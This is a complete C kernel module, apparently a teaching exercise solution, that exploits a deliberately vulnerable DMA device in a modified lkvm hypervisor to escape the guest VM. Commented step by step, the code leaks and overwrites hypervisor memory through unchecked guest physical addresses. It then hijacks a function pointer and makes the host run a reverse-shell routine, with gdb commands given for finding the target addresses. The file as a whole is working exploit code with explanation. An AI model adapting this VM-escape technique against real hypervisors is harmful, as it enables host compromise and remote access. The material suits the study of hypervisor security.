#include <linux/module.h>
#include <linux/slab.h>
#include <linux/dma-mapping.h>
#include <asm/io.h>

MODULE_LICENSE("Dual BSD/GPL");
extern unsigned long system;
extern void revshell(void);

/* Analysis of the bug: the 'broken' device in the modified lkvm does not check that the
 * guest physical address is actually contained in the emulated guest physical memory,
 * and can therefore be used by the guest to both leak and overwrite lkvm memory.
 */

/* Attack plan: we will overwrite fdev.foo_ptr in the lkvm address space with
 * the address of our own 'revshell' function (written in asm_exploit.S),
 * forcing lkvm to spawn a reverse shell when the foo device is accessed.  This
 * strategy works because the guest physical memory is mapped as executable in
 * the modified lkvm (see the PROT_EXEC flag in the mmap_anon_or_hugetlbsf()
 * function in kvmtool-snh/util/util.c file). Otherwise, a more complex exploit
 * would be necessary.
 */

/* We need the host virtual address of 'foo_ptr', i.e., the function pointer
 * that we are going to overwrite. This is a field in the 'fdev' object, which
 * is an instance of 'struct foo_dev'. Since lkvm is compiled as pie, the
 * binary only contains the offset of 'fdev' from the load address. The exercise,
 * however, is run with ASLR disabled, so we can obtain all the information that
 * we need by running lkvm in the debugger:
 *
 * 	gdb kvmtool-snh/lkvm
 * 	start
 * 	p &fdev.foo_ptr
 */
unsigned long const foo_ptr = 0x5555555a2050;
/* We also need the host virtual address of the base of the guest physical memory.
 * We can obtain this from the debugger, too, by putting a breakpoint in the
 * mmap_anon_or_hugetlbfs() function and printing the value returned by mmap().
 * Note that, this time, we need to pass proper arguments to lkvm, otherwise it
 * will exit with an error before reaching that function.
 *
 * 	gdb kvmtool-snh/lkvm
 * 	b mmap_anon_or_hugetlbfs
 * 	r run -k bzImage
 * 	fin
 * (Look for the 'Value returned'...)
 */
unsigned long const guestmem = 0x7fffc8dba000;

/* these come from the definition of the 'broken' device */
#define BROKEN_BASE	0x100
#define	BROKEN_SNR	(BROKEN_BASE + 0)
#define BROKEN_CMD	(BROKEN_BASE + 4)
#define BROKEN_LOMEM	(BROKEN_BASE + 8)
#define BROKEN_HIMEM	(BROKEN_BASE + 12)
#define BROKEN_DMA_OUT	2
#define BROKEN_DMA_IN	1
#define BROKEN_SECSZ	512

/* and this from the definition of the 'foo' device */
#define FOO_PORT	0x200

/* we install and trigger the exploit when the module is loaded, so we write
 * everything in the exploit_init() function.
 */
static int exploit_init(void) {
	char *buf;
	unsigned long revshell_addr;
	unsigned long bufaddr;
	unsigned long target;
	unsigned long *ptr;
       
	/* we allocate a buffer to hold the sector that we are going to read
	 * and write from the broken device. We allocate it on the kernel heap
	 * with kmalloc(). This function will give us a guest virtual address in
	 * 'direct mapped' region of the guest kernel virtual memory. These
	 * addresses can be converted to guest physical addresses by just subtracting
	 * a constant (by using the virt_to_phys() convenience function)
	 */
	buf = kmalloc(BROKEN_SECSZ, GFP_KERNEL);
	if (buf == NULL) {
		printk("out of memory\n");
		return 1;
	}
	bufaddr = virt_to_phys(buf);

	/* 'target' is a fake guest physical address that overlaps 'foo_ptr' in the lkvm
	 * memory. This is the address that we are going to write in the LOMEM/HIMEM
	 * registers of the broken device. To understand how we can let 'target' point to
	 * 'foo_ptr' we can take a look at the broken device sources: the emulator will
	 * just add guestmem to our value, so we only need to subtract guestmem from
	 * the host virtual address of foo_ptr:
	 */
	target = foo_ptr - guestmem;
	printk("buf virt %lx/phys %lx, target: %lx\n", (unsigned long)buf, bufaddr, target);
	/* 'revshell' is the guest virtual address of the code that we want
	 * lkvm to execute when jumping through 'foo_ptr'. Therefore, we need
	 * the *host* virtual address of 'revshell. We can obtain this by first
	 * obtaining its guest physical address and then adding guestmem. The
	 * 'revshell' code, however, is part of this module, which will be
	 * loaded by the kernel using vmalloc(). This function allocates
	 * available frames from the guest physical memory, with no guarantee
	 * that they will be contiguous, and creates a contiguous "view" of
	 * them in guest virtual memory. To obtain the physical address of
	 * 'revshell', therefore, we have to walk the page tables. The
	 * 'vmalloc_to_pfn()' function does this for us, but it will only
	 * return us the 'page frame number' of the physical address, i.e., the
	 * address excluding the lower 12 bits (for 4KiB pages). The missing 12
	 * bits, however, are easy to obtain, since they are equal to the
	 * correspoinding bits of the guest virtual address.
	 *
	 * Note that we should also make sure that the 'revshell' code does not
	 * span two pages, because lkvm will see the pages in the guest physical
	 * order, and therefore execution will fail if the two pages are not
	 * contiguous. For this reason we have aligned 'revshell' to 4096 bytes.
	 * This also means that that the lower 12 bits of 'revshell' are just zeros.
	 */
	revshell_addr = vmalloc_to_pfn(revshell) << 12;
	printk("revshell virt %lx/phys %lx\n", (unsigned long)revshell, revshell_addr);

	/* now we are ready for the exploit. First, we read a sector that contains
	 * the current value of 'foo_ptr'. We do this for robustness: since we will
	 * have to overwrite an entire "sector" of lkvm memory, possibily overwriting
	 * other variables besides 'foo_ptr', we try to overwrite them with their
	 * current value.
	 */

	/* to read the memory we need to order two operations: first a DMA OUT from
	 * lkvm memory to a sector of the emulated device, and then a DMA IN from
	 * that same sector to our 'buf'
	 *
	 * We use sector number 0, but any sector will do equally well.
	 */
	outl(0, BROKEN_SNR);
	/* the source of the DMA operation is the fake 'target' address */
	outl(target, BROKEN_LOMEM);
	outl(target >> 32, BROKEN_HIMEM);
	outl(BROKEN_DMA_OUT, BROKEN_CMD);

	/* now the contents of the hypervisor memory is in sector 0, we just need to
	 * read it into buf. This is a normal DMA operation, from a device sector
	 * to our guest physical memory.
	 *
	 * Note that there is no need to write into SNR, since it already contains
	 * the sector number from the previous operation.
	 */
	outl(bufaddr, BROKEN_LOMEM);
	outl(bufaddr >> 32, BROKEN_HIMEM);
	outl(BROKEN_DMA_IN, BROKEN_CMD);

	/* the first 8 bytes of buf now contain the current value of 'foo_ptr' */
	ptr = (unsigned long *)buf;
	printk("current foo_ptr: %lx\n", *ptr);

	/* now we overwrite the foo_ptr with the host virtual address of revshell */
	*ptr = revshell_addr + guestmem;

	/* Second step: we overwrite 'foo_ptr' (and the adjacent 512-8 bytes) with
	 * the updated value. We still need to do this in two steps: first a normal
	 * DMA OUT operation from 'buf' to any sector of the device, then a fake
	 * DMA IN operation from that same sector to 'target'.
	 *
	 * The LOMEM/HIMEM registers already contain 'bufaddr', so there is no
	 * need to update them.
	 */
	outl(BROKEN_DMA_OUT, BROKEN_CMD);
	/* and now the DMA IN */
	outl(target, BROKEN_LOMEM);
	outl(target >> 32, BROKEN_HIMEM);
	outl(BROKEN_DMA_IN, BROKEN_CMD);

	/* now 'foo_ptr' should be overwritten. By writing into I/O port FOO_PORT
	 * we will cause the hypervisor to call the fdev.foo_ptr() function and jump to
	 * our code.
	 */
	outl(0, FOO_PORT);
	return 0;
}

/* a more robust attack would try to cleanup the 'foo_ptr' when the module is
 * unloaded. You can try to add the necessary code in the exploit_exit() function.
 *
 * Another possible improvement would be implement a guest device, say /dev/exploit,
 * so that the exploit could be triggered at will by writing into the device, instead of
 * being automatically triggered as soon as the module is loaded.
 */
static void exploit_exit(void) {
}

module_init(exploit_init);
module_exit(exploit_exit);
